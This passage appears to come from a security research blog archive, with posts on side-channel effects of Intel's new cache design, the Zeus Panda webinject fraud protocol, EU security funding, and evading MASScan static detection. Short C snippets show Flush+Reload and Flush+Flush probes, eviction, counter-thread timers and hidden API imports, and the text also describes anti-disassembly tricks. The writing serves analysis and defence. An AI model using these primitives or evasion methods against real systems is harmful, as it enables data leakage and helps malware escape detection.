New cache architecture on Intel i9 and Skylake server: An initial assessment

 

Intel has introduced the new i9 CPU, which is positioned as an HEDT (high-end desktop) product. Its microarchitecture is in many respects shared with the new Skylake server microarchitecture. If history is a guide, technology introduced in this segment slowly trickles down to more budget-friendly desktops. From a microarchitecture point of view, it seems that several things about these CPUs will force changes on microarchitectural attacks – especially in the memory subsystem. In this blog post I’ll give a short overview of some of the relevant changes and the effects they may have on microarchitectural attacks. Since I don’t own or have access to an actual i9 or Skylake server processor, this blog post is just conjecture.

 

Summary of the “old” cache hierarchy

The major change over earlier processors from a microarchitecture point of view is that the cache system has received a significant overhaul. Current Intel CPUs have a 3-level cache hierarchy: two very small L1 caches, one for data and one for instructions, and a somewhat larger second-level cache (L2, or mid-level cache). L1 data, L1 code and L2 are part of each core and private to it. Finally, Intel CPUs have had a huge 3rd-level cache (usually called L3 or last-level cache) shared between all cores. The 3rd-level cache is subdivided into slices that are logically connected to a core. To effectively share this cache, Intel connected the slices on a ring bus called the Quick Path Interconnect. Further, the 3rd-level cache was an inclusive cache, which means that anything cached in L1 or L2 must also be cached in L3.

 

Changes

Some of the important changes that have been announced in the Intel Software Optimization Manual [1] are:

–    A focus on a high number of cores in the CPU (up to 18 in the HEDT models)

–    A reduced overall cache size per core (compared to similar older models)

–    A very significant increase in the size of the L2 (a factor of 4)

–    A doubling of the L2 bandwidth, with only a slight increase in latency

–    A reduction of the shared L3 that slightly more than offsets the larger L2

–    A reorganization of the L3 into a non-inclusive cache

–    A replacement of the QPI ring bus with a mesh-style bus

Why do these changes make sense?

Increasing the size of the L2 at the cost of the L3 makes sense, as the L2 is much faster than the L3 for applications – one can only assume that shrinking the L3 helps reduce die size and cost. Also, the increase in the size of the L2 caches reduces the marginal utility of the L3. Finally, as the probability of cache set contention rises with the number of cores, it becomes advantageous to make a larger part of the total cache private. Cache contention in the L3 is a problem Intel has battled before: with Haswell they introduced Cache Allocation Technology (CAT) to allow software to control cache usage of the L3 to deal with contention.

The number of cores is probably also the reason why Intel dropped the QPI ring bus design. There is a penalty for having memory served from another core’s slice. On a ring bus this penalty is proportional to how far apart the cores are on the ring, and with more cores this penalty increases. Moving to a more flexible system seems sensible from this vantage point.

Having an inclusive L3 makes cache coherency easier and faster to manage. However, an inclusive cache comes at a cost, as the same data is loaded in multiple caches. The relative loss of total cache storage space is exactly the ratio of (L1 + L2) to L3 size. Previously this ratio has been around 1:10 (depending on the actual CPU), but with the L2 quadrupled and the L3 made a tiny bit smaller, the ratio is now about 1:1.5 – for instance, with 64 KB of L1 and 1 MB of L2 per core against roughly 1.375 MB of L3 per core, the data duplicated under an inclusive policy could occupy around three quarters of the L3. Thus, making the L3 cache non-inclusive is essential to performance. At this point it’s important to notice that Intel uses the wording “non-inclusive”. This term is not well defined. The opposite of inclusive is exclusive, meaning that the content of the L3 cannot be loaded in L1 and L2. I think Intel would have used the well-defined term exclusive if the cache really were exclusive. Thus, it is probably fair to assume that non-inclusive means that data may or may not be cached in L1, L2 and L3 at the same time, but exactly how this is governed is important. Unfortunately, there is no information available on this.

It’s worth noting that many of these changes have been tested and developed by Intel for the Knights Landing microarchitecture. Knights Landing is a high-throughput microarchitecture sold in relatively small volumes, so it’s likely that many features developed for this CPU will trickle down. It’ll be interesting to see whether Intel plans to trickle them down into laptops/small desktops or use different cache designs for different classes of CPUs.

 

Effects

Cache side channel attacks

This new cache layout is likely to have a profound effect on cache side channel attacks. I think Flush+Reload will keep working even with the non-inclusive L3. The flush primitive is based on the CLFlush instruction, which is part of the instruction set architecture (ISA). Intel has been very reluctant in the past to change the ISA, so my estimate is that flushing will work as always. I also think the reload primitive will remain viable – I find it likely that an uncached load will also load data into the shared L3. It’s likewise likely that the QPI replacement bus can be used to fetch data from private L2 caches, similar to AMD’s cross-CPU transmission. This would give Flush+Reload a Flush+Transfer flavor, but it would still work; for more on Invalidate (Flush)+Transfer see [2]. Since the L3 cache must be filled somehow, we can be fairly certain that at least one of these things is true, if not both – the latter being my guess.
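To make the primitives concrete, here is a minimal Flush+Reload round as a C sketch (GCC/clang x86 intrinsics; the function name and the threshold separating a cache hit from a memory access are illustrative, and the threshold would have to be calibrated per machine):

#include <stdint.h>
#include <x86intrin.h>  /* _mm_clflush, _mm_mfence, __rdtscp */

/* Returns nonzero if the victim touched *p since the last flush. */
static int fr_probe(volatile uint8_t *p, uint64_t threshold)
{
    unsigned int aux;
    _mm_mfence();                     /* keep earlier memory traffic out of the measurement */
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;                         /* reload: fast iff the line is cached */
    uint64_t t1 = __rdtscp(&aux);
    _mm_clflush((const void *)p);     /* flush, arming the next round */
    return (t1 - t0) < threshold;
}

On the new microarchitecture, the open question is not whether this code runs, but which cache level serves the reload and how large the timing difference remains.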

The big changes are likely to be related to the evict and prime primitives. Assuming that cache contention between cores was a major reason for redesigning the cache, it’s unlikely that one can load data into another core’s private hierarchy. Thus, the prime and evict primitives probably stop working for cross-core attacks. However, both are likely to still work decently within a core (hyper-threading, or scheduling on the same core).

While the ISA behavior of CLFlush is almost certain to remain unchanged, the microarchitecture below it will see significant changes. With the QPI ring bus gone, using the Flush+Flush attack by Gruss et al. [3] to find out how many hops away on the ring a particular slice is almost certainly won’t work. This does not mean that you won’t find a side channel in CLFlush: buses are typically bandwidth limited and thus an obvious source of congestion – without an inclusive L3, the bus bandwidth might even be easier to consume. Also, Flush+Flush as a Flush+Reload replacement is likely to show different timing behavior in the new microarchitecture. My guess upfront is that a timing difference, and thus a side channel, remains.
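For comparison, a Flush+Flush probe times the flush itself rather than a reload; a sketch under the same assumptions as above:

#include <stdint.h>
#include <x86intrin.h>

/* clflush takes slightly longer when the line was cached - this
   timing difference is what the attack relies on. */
static int ff_probe(volatile uint8_t *p, uint64_t threshold)
{
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    _mm_clflush((const void *)p);
    uint64_t t1 = __rdtscp(&aux);
    return (t1 - t0) > threshold;     /* slow flush = line was cached */
}

Whether and how this timing difference shifts on the new cache hierarchy is exactly what would need to be re-measured.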

Also affected by the non-inclusiveness of the L3 are row buffer side channel attacks, such as those presented by Pessl et al. [4]. Without effective eviction, cross-core attacks may be severely stifled. The ability to reverse engineer the complex DRAM mapping functions is likely to remain unchanged, as it hinges not on eviction but on the CLFlush instruction’s ISA behavior.

With the CLFlush instruction and eviction likely still working on the local core, row hammer will remain effective. But in some scenarios, indirect effects of the microarchitecture changes may break specific attacks, such as that of Bhattacharya and Mukhopadhyay [5]. The reason is that such attacks rely on information leakage through the caches, which becomes more difficult to leverage, as described above.

 

Future

While the changes to the cache make sense with the significant number of cores in the affected systems, it seems unlikely that the changes will trickle down to notebooks and laptops. With only two cores, the existing cache design seems sensible. Thus we are likely to see a two-tier cache design going forward.

Conclusion

Having a non-inclusive L3 cache is significantly more secure from a side channel perspective than an inclusive one in cross-core scenarios. This opens up a way to defend against these attacks by isolating different security domains on different cores, potentially even dynamically. While Flush+Reload is likely to be unaffected, this attack is also the easiest to thwart in real-life scenarios, as avoiding shared memory across security domains is an available and effective countermeasure. Lots of new research is required to gauge the security of these microarchitecture changes.

 

Literature

[1] Intel. Intel® 64 and IA-32 Architectures Optimization Reference Manual. July 2017. https://software.intel.com/sites/default/files/managed/9e/bc/64-ia-32-architectures-optimization-manual.pdf

[2] Irazoqui, Gorka, Thomas Eisenbarth, and Berk Sunar. “Cross processor cache attacks.” Proceedings of the 11th ACM on Asia Conference on Computer and Communications Security. ACM, 2016.

[3] Gruss, Daniel, et al. “Flush+Flush: a fast and stealthy cache attack.” Detection of Intrusions and Malware, and Vulnerability Assessment. Springer International Publishing, 2016. 279-299.

[4] Pessl, Peter, et al. “DRAMA: Exploiting DRAM Addressing for Cross-CPU Attacks.” USENIX Security Symposium. 2016.

[5] Sarani Bhattacharya, Debdeep Mukhopadhyay: “Curious case of Rowhammer: Flipping Secret Exponent Bits using Timing Analysis”. http://eprint.iacr.org/2016/618.pdf

Zeus Panda Webinjects: Don’t trust your eyes

In our last blog article, Zeus Panda Webinjects: a case study, we described the functionality of current Zeus Panda webinject stages and gave some insight into the corresponding administration panel. As we only scratched the surface of the target-specific second webinject attack stage (in the following referenced as the 2nd attack stage), we would like to share more details about this part.

Basically, the 2nd attack stage already includes the complete code needed for the attack. The different code branches are triggered by setting status variables, especially the branch variable already introduced in our previous article on that topic. Last time we also introduced the send() function, which is used to exfiltrate data. send() isn’t entirely unidirectional: the HTTP response to this request includes further code that is evaluated as JavaScript. Thereby the backend is able to set the different status variables and trigger the existing code branches of the 2nd attack stage. Let’s dive into the details of this communication protocol:

Communication protocol and status variables

Figure 1: Communication protocol

Figure 1 illustrates the communication protocol between the 2nd attack stage and the backend server. We see the different steps of the communication, the branches triggered, and the website on which the step occurs. Before going into details, the concept behind the communication is the following:

  1. The current attack state is sent from the client to the backend server.
  2. The backend checks for the current attack state and sets the right response parameters to initiate the next attack stage.
  3. The backend response contains variables to notify the 2nd attack stage (client) which attack branch should be executed next.
  4. The 2nd attack stage evaluates the response variables and triggers the next branch.
  5. This procedure is repeated until the final state of the protocol is reached.

Time to branch

Let’s take a detailed look into the different branches now.

Step 1: The SL branch is triggered at the beginning of the attack, when an infected victim accesses the login page of the targeted online banking site, enters the login credentials and clicks the submit button. (Note: the low-level Trojan functions need to trigger the initial webinject (generic loader) on that website, and therefore the URL of the online banking website has to be listed in the Trojan config file.) The submitted login credentials are intercepted and exfiltrated to the backend (see previous blog post), then the 2nd stage code calls the original login function of the banking or payment website. The backend now registers the new victim, identified by the botid, and returns an empty response to the webinject.

Step 2: At this point, the victim has successfully logged in and has been redirected to the account balance overview page. This triggers the 2nd branch: CP. The CP branch is called multiple times during the attack and transmits general status information about the victim to the attacker. The response of the backend contains status flags to trigger the next step of the attack. At this point, the backend signals to initiate the attack.

Step 3: The attack signal triggers the 3rd step shown in Figure 1: the TL branch. This branch is used to collect details from all available accounts by using the grabber module. Furthermore, a flag is set to indicate a page reload after the response of the send function has been received. The collected data is then exfiltrated again. The botid is used to correlate transmitted data with existing victim entries in the backend and therefore works as a unique identifier for the victim. The server response is empty, but the previously set reload flag now triggers the CP branch again.

Step 4: The CP branch now sends the same information to the backend as described in step 2. As the backend has already stored a different state for the botid, the response is different now: it signals to the 2nd attack stage that the grabber module has finished and the ats module should start. This module is used to manipulate account details like the account balance or transaction details. Also, some status flags are set to trigger the next branch.

Step 5: The GD branch. This branch is used to collect and exfiltrate account details of the victim. As already described in step 3, the reload flag is used to trigger the CP branch again.

Step 6: The CP branch again submits status information, and the backend now triggers the next step of the attack. Besides some status flags, details about the target account and some fake data are provided. The data is used by the CP branch to display a fake overlay with a message and/or images, to trick the victim into starting a transaction. To that end, the fake overlay is used like in a normal phishing attack. We could observe different kinds of messages, which can be categorized into different modi operandi (see below).

If the victim fell for the scam, the previously provided data is used to pre-fill the transaction form. Naturally, this data contains a target account for the transaction. This account will be controlled by the attacker somehow, i.e., it most likely belongs to a money-mule.

Additionally, the response from the backend contains fake information to be displayed. Depending on the modus operandi, this information is used to display different transaction details to the victim than the ones used for the transaction in the background.

Step 7: Now the victim is redirected to the overview page for a successful transaction. In combination with the current flag state, this page visit triggers the TL branch of the 2nd stage code. The TL branch collects details from the transaction overview page and exfiltrates them to the backend. This indicates a successful transaction to the attacker. The backend response is empty. The webinject transitions into the next state, without the need for further communication with the backend.

Step 8: The last triggered branch is called CG. It creates a copy of the complete DOM of the successful transaction overview page and exfiltrates it to the backend. There is no indication that this data is displayed in the admin panel, so we assume it is transmitted for debugging purposes only.

Modi Operandi

In the following we detail two exemplary modi operandi that we observed during our analysis. The actual visual appearance differs per target, as the webinject makes heavy use of the style sheets provided by the target website. This is a very straightforward way to properly brand fraudulent content to match the corporate design of the targeted banks or payment providers. We focus on the content shipped to banking customers.

Charity Fraud: SOS-Kinder


The victim is asked to donate 1€ to a non-profit organization, in this case for SOS children. This mimics the well-known, internationally active “SOS-Kinderdorf” organization. The German text is well written and does not contain the obvious indications of phishing that we all know and love from the occasional phishing mail, like contorted grammar and a more than flowery vocabulary. No Google Translate in sight here. To leverage this scam vector, the webinject makes use of the data provided by the backend in step 6, as detailed above. Using an overlay, the victim is made to believe he or she is transferring 1€, but under the hood the amount is changed to a much higher value.

The attackers follow a very classic social engineering approach for our part of the world and appeal to the victim’s helpfulness: who doesn’t want to help children in need by spending 1€? We refer to this kind of attack as charity fraud.

Refund Fraud: Finanzpolizei


The overlay presents a message to the victim, indicating that a transaction has been made to their account. As the victim sees a manipulated version of their account balance, they really believe the transaction has happened. Furthermore, the text indicates a preliminary investigation by the “Finanzpolizei” against the initiator of the transaction. If the victim does not transfer the money back, the text threatens prosecution by law enforcement for participating in a money laundering scheme.

Finally, all the Google Translate and contextual cluelessness we came to love in the scams out there! Regrettably for the attacker, not all German-speaking countries are actually Germany. (We tried that once, partially, and it was a horrible idea.) An institution called “Finanzpolizei” does indeed exist – but not in Germany. The intended target audience for this scam is thus supposedly to be found in Austria; however, the scam is also actively used in Germany. The German text includes some mistakes and is not as well written as in the first modus operandi shown above.

In the case at hand, the attackers try to make the victim follow through with a classic refund scam by threatening legal consequences. As the story works without the need to manipulate the transferred amount under the hood, the fake data needed in the first modus operandi is not used in this kind of attack. Nevertheless, the webinject is kind enough to prefill the transaction form with the correct details to ease the transaction for the victim.

Return of the victim

Now let’s assume the victim has been tricked into initiating a transaction themselves, sending their money to the attacker. What happens if the victim takes a look at their online banking account some time later? As expected, the 2nd attack stage is also prepared for that case: the user is presented with the “temporarily unavailable” notification (see Figures 1 and 2 from our previous post) and the login function of the target website is disabled. As long as the status variables are set to the final state of the described communication protocol, the victim is thus unable to access their account again, as long as the backend server is reachable. Even if this blocking functionality is disabled, account information like transaction details and total balance is still manipulated. As these manipulations use the original style sheets (CSS) of the target institution, the victim has no way to visually distinguish a fake entry from an original one.

Conclusion

Nowadays almost all financial institutions use two-factor authentication to protect their users from fraud. The modi operandi of current banking trojan attacks successfully circumvent this by using social engineering techniques. The victim is tricked into initiating the transaction willingly and happily provides all the information needed to confirm it. This is achieved by visible modifications of the website that are indistinguishable from the original website content. The success rate of these attacks is still quite high.

By using a multi-layered attack, it’s also cumbersome for analysts to get a complete insight into the technical details. As soon as the backend server is no longer available, only the 1st stage of a webinject is accessible on an infected machine. Without the backend server, most of the attack code is not available, and therefore some pieces of the puzzle are missing.

These kinds of multi-layered attacks have become more and more complex and sophisticated. However, beyond the visual appearance, the code of the original website is modified heavily to make these attacks work, and these modifications necessarily leave a footprint. In our fraud detection solutions, we provide our customers with instant visibility into these modification symptoms so they can fare better at protecting their customers’ assets.

Authors: Manuel Körber-Bilgard and Karsten Tellmann

Security for Sale? – On Security Research Funding in Europe

On Wednesday, Feb. 22, 2017, a collective of 20 journalists from eleven countries published their research on the European security industry. The article, Security for Sale, published at The Correspondent, mostly revolves around the question of how the funding several players in the field received from the Horizon 2020 (H2020) and FP7 framework programmes is put to use for the European people. H2020 is the European Commission’s current funding initiative for research and innovation. Here is the commission’s own explanation.

Simplified, the authors of Security for Sale conclude that the benefit of funding security research for Europe as a whole is limited, but that the funding works pretty well as a hidden subsidy for the industry itself. Their wording is more lenient than mine, but nevertheless I feel that the picture the authors draw is incomplete, and I’d like to add another perspective. I can only assume that the data for the article stems from the Secure Societies line of funding, as its core topics are emphasized in the article and some of the articles it links to refer to it – the article regrettably does not contain any straightforward references to its sources. And in my opinion, the Secure Societies line of funding does indeed sometimes yield research results that are scary to everyone who did not answer the question of ‘how do we want to live?’ with ‘I liked the setting depicted in Minority Report quite a bit, but it’s missing the effectiveness of Judge Dredd’.

The authors describe the landscape in the security sector roughly as 1) the big players, where kinetic and digital technology converge, 2) research organizations, 3) universities, and 4) small and medium enterprises (SMEs). Our sector, of Ze Great Cybers, primarily hides in 4) and, increasingly, in 1). The article does not explicitly touch the field of information security, and neither do many calls in the Secure Societies context. However, most of the projects need to touch the digital domain at some point or other, making it clear that a division between information security and all the other potential flavors of security is merely artificial, given our current state of technology. As the authors observe, this is also reflected by the upcoming funding opportunities:

“similar programs are being set up for cybersecurity and military research”

The EU and some of its member states are late to the game, and I’m aware that not everybody hacking at computers likes the notion that InfoSec and defense converge. I also dislike the idea, and I somehow liked the Internet better when it was still a lot emptier – a sentiment Halvar Flake once expressed as well.

However, I have come to enjoy civilization and, like most people, I rely on the critical infrastructures that make our societies tick. I’ve been leading incident response assignments in hospitals more than once in the last year, and as a human who may suddenly require the services of a hospital at some point or another, I am very grateful for the effort and dedication my colleagues and the clients’ staff put into resolving the respective incidents. If this means I’m working in defense now, then I still dislike the notion, but I see that the work is necessary – and also that we need to think more on the European scale if we want to protect the integrity of our societies. Packets only stop at the borders of oppressive societies, and that shouldn’t be us.

Now let’s have a look at where the EU’s security research funds go, according to the article. The authors state

“Companies received by far the most money. That’s not particularly surprising; these same companies were the ones influencing funding policy.”

and illustrate it with the following figure:

Figure 1: Security research funding distribution. Illustration by The Correspondent.

In 2015, I was directly responsible for four H2020 grant applications and consulted on several other applications for nationally or regionally managed funding opportunities. Security in its various flavors is a tiny part of that picture. I’m happy to state that we had an above-average success rate. The illustration in the article struck me as familiar: to me, Figure 1 simply shows the typical distribution of funding within the majority of grant applications I’ve worked on. So it is hardly surprising that the global distribution of funding within the technology sector of the programme looks very similar. There is nothing much sinister about that.

Larger corporations do have more opportunities to influence policy, as they can afford the time and resources to lobby. But the main reasons for the distribution are salaries on the one hand and grant policy on the other. An engineer working at a large corporation will be more expensive than a PhD student by a factor of 1.2 to 2.3, depending on the country and the respective corporation. A factor of ~1.9, as in the figure, does not look unreasonable, given that the figure accounts for accumulated costs, not just personnel, and that it is more likely that a corporation or a research institute will take on the effort of building a demonstrator or pilot installation of a technology, as universities regrettably tend to lack monetization strategies for research results.

Government entities, as the next in line, tend to have very limited personnel resources for research projects and do not have a lot of wiggle room when it comes to contributions. With a funding scope that aims at technological advances, funding for advisory firms is often politically limited, and rightly so. As the figures are very much aggregated, I can only assume that the complete sum also contains Coordination and Support Actions (CSAs), which are rather limited funding schemes, financially speaking, that aim at connecting related projects and generally at the systematization of knowledge, to avoid arriving at one insight at twice or thrice the funding. This work is sometimes done by entities that could classify as advisory firms. ‘Other’ can be translated to network and dissemination partners, or dedicated project management (which makes a lot of sense – H2020 projects can be large in terms of the number of partners).

Now let’s not talk about militarizing corporations enriching themselves, as the article’s authors suggest; let’s talk about research funding effectiveness. In my conversations with the granting side of research funding, it is a constant pain that a significant share of funded research projects never amounts to a product. I have seen quite a few projects where I would judge without hesitation that the project was a WoMBaT (i.e., a Waste of Money, Brains, and Time) and primarily served to compensate for the lack of public funding towards universities.

But that is only a small part of the picture. Another part is that there is a very expensive zone between ‘things you can publish’ and ‘things you can actually use’. Simplifying, technological progress has a tendency to increase complexity. To specify their expectations regarding the results of a funding measure, the European Commission adopted NASA’s Technology Readiness Levels (TRL). In the rather broad field of engineering, we often see the requirement of a validation under lab conditions (TRL 4), up to a working prototype under field conditions (TRL 7), depending on the class of funding action. The funding of a given project often ends at that point.

Using my terminology from above, in the best case you then have something you can publish and/or show off, i.e., an interesting approach that has been shown to be feasible. Between that and monetization lie the roughly two to seven years you’ll often need in engineering to go from a prototype to a product. And strictly speaking, research funding ends here, because research ends here. There are almost no publicly funded actions that will allow you to go towards product development, although piloting of a technology in the field can be funded (TRL 9). Nevertheless, either a company is now able to fund the continued development towards a product, or not. Even this is still a limited view, as one doesn’t need a new product to monetize research results: it is just as desirable to improve an existing set of products and services based on new research results. It is, however, by far not as visible.

Now why so much funding for the big players? Research grants tend to have a bias towards those applicants who were able to successfully complete a project, presented impressively in the past, and are generally held in good standing. Sounds familiar? Yep, it sounds like selecting talks for Black Hat or any other non-academic security conference, where the process is single-blind and the committee needs to judge based only on an abstract, not a full paper with a proper evaluation section and extensive related work. If the data is relatively poor, judgment needs to rely on the applicant’s reputation and previous work to some extent. And in comparison to a well-backed research paper, grant applications are by their nature always speculative, although very much more detailed than the abstract of a conference submission. If one knew how something was done in the first place, there’d be no need to call it research and there’d be no reason for a grant. The important point is not to fail, if one wants to continue receiving grants (cf. bias, above).

And that still does not fully account for the observation that big players are doing very well in grant applications. An H2020 application is a lot of work – often a hundred pages just for sections 1 to 3, which can easily amount to 100 person-days for the coordinator until everything is properly polished. The acceptance rate for Research and Innovation Actions can be as low as 6%; academic tier-1 conferences are relaxed in comparison. A small company may simply be unable to compete economically, i.e., it cannot accept the very real risk of seeing a lot of effort come to naught. It’s not as hard in other types of actions, but the risk is still significant, and acceptance rates have been getting worse, not better.

“Our investigation reveals that EU security policy emphasizes technology: a high-tech solution is being sought for a societal problem.”

From an outside position, I feel that I’m unable to judge the intentions and the mindset of the various individuals responsible for the actual wording of the H2020 calls. The persons from this context I’ve met in the past did, however, not leave an impression of exceptional naivety. I genuinely believe that it is in the best interest of European countries and the EU to fund security research, without denying that there may be recipients of funds with questionable ethical standards. As Europeans, we need to address these issues. I do not want to live in a militarized society, and I don’t believe in solving societal problems purely through technology. However, I see a significant number of opportunities where usable, efficient technology can enable solutions to societal problems. Given my socialization, I may have a bias towards the security spectrum of research, but that said, I see quite a few things that can and should be done to positively impact the security of our societies. In a changing political climate, Europe needs to step up its security game, also and especially in the digital domain.

And now excuse me, I need to continue that research grant proposal. I’m not doing that for kicks, and neither in pure self-interest.

MASScan & the Problems of Static Detection of Microarchitectural Attacks

 

Introduction

Microarchitectural attacks have been known for more than a decade now. The designs behind those microarchitectures are typically optimized for performance, cost and backward compatibility. Therefore it seems unlikely that we will see fixes in CPU architectures which address the root cause of these vulnerabilities any time soon. With this in mind, the search for software-based solutions to this problem becomes a priority.

As a contribution to this effort, Irazoqui et al. [1] published an interesting paper on static methods to detect microarchitectural attacks, titled “MASScan: Stopping Microarchitectural Attacks Before Execution”. The idea is as good as it is naïve. In this blog post I will discuss the reasons behind this position. It should also be noted that the paper in question is an early version and subject to change.

 

MASScan

The analysis works by flagging code that is rare in real-life applications and often used in an attack context. Here, ‘attack context’ covers code which is either required for an attack to work or which improves an attack’s performance. The list is:

Cache flushing instructions

clflush, clflushopt
(the authors do not mention clflushopt, but I have included it for completeness)

Non-temporal instructions

movnti & movntdq

Timers

Counter threads, performance counters, and the rdtscp and rdtsc instructions, as well as attempts to set thread affinity to gain core co-location, which is important for the accuracy of counter threads.

Fences

lfence, mfence & cpuid

Locking instructions

lock prefix

Algorithmic constructions

Eviction set access code, pointer chasing, jumps in a loop

 

The instructions in question are rarely ever used. With the exception of the lock prefix, all of them are part of the 0x0F escape opcodes. In Z0mbie’s [5] opcode list (which unfortunately is outdated at the time of writing), 0x0F opcodes represent less than 2% of all opcodes, based on data from 1700 executables. The lock prefix is measured, but is rounded down to 0% in this list. This could serve as an indication that vindicates the authors’ notion.

The good part is that solid static analysis is able to effectively spot problems and highlight them to a human analyst. Further manual analysis can then be performed based on those indicators, to identify malignant behavior and suspicious cases or to vet out false positives. What makes this approach challenging is that static analysis is very difficult to do well and impossible to do right, especially when factoring in that attackers actively try to evade static analysis. The following demonstrates what such evasive action might look like.

 

Microarchitectural & Rice

Rice’s theorem states that all non-trivial semantic properties of programs are undecidable. In short, obfuscation is difficult to deal with. The bad news is that microarchitectural attacks are non-trivial semantic properties and as such, per Rice’s theorem, undecidable. In other words: you could achieve the same result in an infinite number of ways, without anyone being able to pinpoint the “right” way. You will never be able to deduce from the semantics all the syntactic representations that cause them.

The example I like to use is this: one could build an interpreter which takes the original program as input. The output of the interpreter would then have the exact same semantics but a different syntax. Obviously, one could then build a new interpreter that processes the first interpreter’s syntax, and so on and so forth. Consequently, we cannot generate a database of syntax representations for a given semantic. The clever reader will already know that microarchitectural attacks do not lend themselves well to emulation, or to obfuscation for that matter: they often rely on rare syntax elements (rare instructions), execution time is a very real concern, and any obfuscation might change microarchitectural states that are important to the attack. However, this doesn’t mean evasion is impossible.

Let’s go through the above list from an attacker’s point of view.

Cache flushing instructions

The clflush instruction can be replaced by eviction code, as demonstrated by Oren et al. [2] as well as Gruss et al. [3]. This relocates the problem from detecting dangerous instructions to detecting dangerous algorithms. It effectively disqualifies the syntactic element clflush as an answer to a semantic question.
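A sketch of the idea: instead of flushing, the attacker touches enough addresses congruent to the target to exhaust the ways of its cache set (building the eviction set is the hard part of the attack and is omitted here; the names are illustrative):

#include <stddef.h>
#include <stdint.h>

/* 'evset' is assumed to hold pointers mapping to the same cache
   set (and slice) as the target; n is at least the associativity. */
static void evict(volatile uint8_t **evset, size_t n)
{
    for (size_t i = 0; i < n; i++)
        (void)*evset[i];              /* plain loads - no clflush anywhere */
}

No rare instruction appears; the only thing left to flag is the access pattern itself.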

Non-temporal instructions & timers

Timers are indeed the Achilles heel of most microarchitectural attacks. The rdtsc(p) instructions are a telltale sign of such an attack. Unfortunately, though, they are used by benign applications as well. Often these instructions are wrapped in API functions, e.g. the QueryPerformanceCounter API on Microsoft Windows. The problem with such API calls is that they can be imported dynamically in any number of ways, which makes static analysis fairly cumbersome.
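For illustration, a sketch of one of the many possible dynamic import variants on Windows (the API string could additionally be built at run time, leaving nothing for a static import-table scan to find):

#include <windows.h>
#include <stdio.h>

typedef BOOL (WINAPI *qpc_fn)(LARGE_INTEGER *);

int main(void)
{
    /* QueryPerformanceCounter resolved at run time: it never shows
       up in the executable's import table. */
    HMODULE k32 = LoadLibraryA("kernel32.dll");
    qpc_fn qpc = k32 ? (qpc_fn)GetProcAddress(k32, "QueryPerformanceCounter") : NULL;

    LARGE_INTEGER t;
    if (qpc && qpc(&t))
        printf("ticks: %lld\n", (long long)t.QuadPart);
    return 0;
}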

Counter Threads

As for counter threads, they too can be implemented in numerous ways. Counting does not have to be monotonically increasing, only deterministically changing. As the CPUs are superscalar, some instructions can be added to the loop at a very low accuracy penalty. And of course, the loop can be camouflaged. This not only obscures the actual nature of a function (e.g. a counter thread), it also takes the detection into potential false positive territory. Finally, some attacks (like attacks on KASLR) can be repeated, which allows a low-accuracy timer to be used multiple times, using the law of large numbers to average out the noise.
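A minimal counter-thread sketch (POSIX threads; a real implementation would pin the counter to a sibling hyperthread of the measuring thread and may camouflage the loop):

#include <pthread.h>
#include <stdint.h>

static volatile uint64_t ticks;       /* the makeshift clock */

static void *counter(void *arg)
{
    (void)arg;
    for (;;)
        ticks++;                      /* any deterministic update works */
    return NULL;
}

/* Usage sketch:
     pthread_t t;
     pthread_create(&t, NULL, counter, NULL);
     uint64_t t0 = ticks;
     ... probe a memory address ...
     uint64_t elapsed = ticks - t0;   // timing without rdtsc
*/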

Fences

Fences are rarely a strict requirement for attacks. They do tend to lower the noise, but an attack can often do without them. For instance, Oren et al. [2] do prime+probe in JavaScript without a fence, and Flush+Reload works fairly decently without fencing as well. Also, makeshift fences can in some cases be produced by gaming the reordering: for instance, filling the reorder buffer with dependent instructions before starting a round of the attack will serve well to fence against already pending loads and stores.

Locking instructions

I’m not aware of any substitution for the lock prefix. In this particular case, we indeed have an indicator that is difficult for an attacker to replace. It should be noted, though, that on Microsoft Windows the Interlocked* API functions use the lock prefix, and consequently the same problems arise as with the QueryPerformanceCounter API.

Algorithmic constructions

As far as algorithmic constructions are concerned, those can be varied and obfuscated ad nauseam. Therefore, they make for a poor indicator.
For instance, you could perform eviction using a vector, a tree structure or, in fact, any other data structure. Each of them will generate completely different code. Eviction can be triggered by any instruction that uses memory – therefore, any instruction would achieve this. A very old approach has been memset, which comes at a steep performance penalty for the attacker. However, it would likely suffice for spying on keyboards in Gruss et al. [4] . Call qword ptr [address] can touch two cache lines to load the address and one on the stack, as well as the one or two where the instruction itself lies. That is just an example of how ugly eviction can be made. We could argue with a performance penalty in this case. However, we should bear in mind that optimal eviction strategies not only touch uncached memory, but also memory that is already cached – see Gruss et al. [3]!

It gets worse from there: for row hammer, I suggested that we do not even need eviction. Instead, we can bring the cache coherency policy into play to cause write-backs into memory, see Fogh [8]. This provides yet another algorithm that would have to be detected to protect against row hammer, and it too can of course be implemented in many different ways.

 

Classic malware obfuscation – Anti-static-analysis methods

 

Copy protections and malware have historically used a number of methods to defeat static analysis.

Self-modifying code

I wrote my first executable packer in 1995; packers go back further than that, though. Once an executable has been packed, the only code available to static analysis is the first stub of the unpacker. Unfortunately, malware authors are aware of this technique, and it’s even available for purchase online as part of COTS malware-as-a-service. Also, packers used commercially for copy protection can be used for obfuscation like this.

Malware can of course also decrypt data and save it as an executable on disk, or even in memory, to avoid static analysis. Techniques such as “Run-PE” are widespread in real-world malware.

Another example of self-modifying code is JIT compiling, which is what JavaScript engines do. In fact, I quite often use the Keystone assembler JIT-style for building microarchitectural attacks, because it gives me a lot more control than I get from the compiler.

Opening hidden browser windows using malicious JavaScript is entirely possible, and Oren et al. [2] demonstrate that prime+probe runs well in JavaScript. It is worth noting that the browser components can be linked into the malware and consequently do not need to be present on the victim’s computer.

Such ways of hiding code from analysis are already commonplace and no longer qualify as sophistication in malware.

Anti-disassembly and code reuse

Static analysis can be performed either on source code or on disassembly. Commercial providers, however, tend not to share their source code for intellectual property reasons, which leaves disassembly as the only method of analysis. Unfortunately, the x86 platform has variable-length instructions, which makes it difficult to locate the starting point of an instruction. Historically this has been used as a means to thwart disassembly: a clflush instruction can easily be hidden from a disassembler as part of, say, a mov instruction. The extreme version of this is doing code-reuse attacks such as ROP. Obviously, a clflush “gadget” does not have to be part of the shipped malware, but could very well be part of the operating system – clflush (in its simplest form) assembles to 3 bytes, of which the attacker can influence the third by picking the operand, making it reasonable to find a suitable gadget somewhere in the operating system.
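A sketch of how a clflush can hide from a linear-sweep disassembler (GCC/clang inline assembly on x86-64; a minimal example, not taken from any real sample): the disassembler decodes the bytes after the jmp as a harmless mov eax, imm32, while execution enters one byte later and hits the clflush concealed in the mov’s immediate:

#include <stdint.h>

static uint8_t line[64];

int main(void)
{
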